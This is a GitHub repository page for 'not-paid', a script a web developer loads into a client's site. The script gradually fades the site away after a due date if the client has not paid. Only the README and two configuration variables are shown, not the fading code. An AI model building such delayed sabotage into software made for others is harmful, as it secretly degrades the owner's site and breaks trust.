Skip to content

rsempere/not-paid

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

16 Commits
 
 
 
 

Repository files navigation

Client did not pay?

Add opacity to the body tag and increase it every day until their site completely fades away. Set a due date and customize the number of days you offer them until the website is fully vanished.

/* change these variables as you wish */
	var due_date = new Date('2017-02-27');
	var days_deadline = 60;
/* stop changing here */

Usage

Just load the .js file in <head>

Author

Inspired from twitter (@riklomas) Made by Ciprian, Romania

About

Client did not pay? Add opacity to the body tag and increase it every day until their site completely fades away

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • JavaScript 100.0%